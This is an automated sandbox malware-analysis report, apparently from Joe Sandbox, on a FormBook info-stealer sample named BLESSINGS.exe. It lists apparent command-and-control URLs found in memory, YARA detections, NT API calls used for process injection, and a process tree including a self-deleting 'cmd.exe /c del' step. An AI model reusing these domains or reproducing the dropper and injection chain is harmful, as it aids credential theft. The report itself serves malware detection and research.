Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.novergi.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.quintred.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.quintred.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.quintred.com/jqc/www.novergi.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.quintred.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lande
          Source: BLESSINGS.exe, 00000001.00000002.422231496.0000000001180000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match; File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419D60 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419E10 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419E90 NtClose
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419F40 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419D5D NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419E0B NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419E8A NtClose
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_00419F3A NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017799A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017795D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779950 NtQueueApcThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017799D0 NtCreateProcessEx
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_0177B040 NtSuspendThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779820 NtEnumerateKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017798A0 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779B00 NtSetValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_0177A3B0 NtGetContextThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779A10 NtQuerySection
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779A80 NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779560 NtWriteFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_0177AD30 NtSetContextThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779520 NtWaitForSingleObject
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017795F0 NtQueryInformationFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_0177A770 NtOpenThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779770 NtSetInformationFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779760 NtOpenProcess
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779730 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_0177A710 NtOpenProcessToken
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779FE0 NtCreateMutant
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779670 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779650 NtQueryValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_01779610 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 8_2_017796D0 NtCreateKey
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045695D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045699A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045696D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045696E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_0456B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045698F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045698A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569560 NtWriteFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_0456AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045699D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045695F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569A10 NtQuerySection
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569A20 NtResumeThread
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_0456A770 NtOpenThread
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569760 NtOpenProcess
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_0456A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_04569730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_0456A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_045697A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9D60 NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9E10 NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9E90 NtClose
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9D5D NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9E0B NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9E8A NtClose
          Source: C:\Windows\SysWOW64\raserver.exe; Code function: 15_2_001E9F3A NtAllocateVirtualMemory
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 0173B150 appears 35 times
          Source: BLESSINGS.exe | Binary or memory string: OriginalFilename vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429031848.0000000005240000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPe6.dll" vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSHCore1.dll0 vs BLESSINGS.exe
          Source: BLESSINGS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@3/1
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: BLESSINGS.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: BLESSINGS.exe | Virustotal: Detection: 45%
          Source: BLESSINGS.exe | ReversingLabs: Detection: 15%
          Source: unknown | Process created: C:\Users\user\Desktop\BLESSINGS.exe 'C:\Users\user\Desktop\BLESSINGS.exe'
          Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
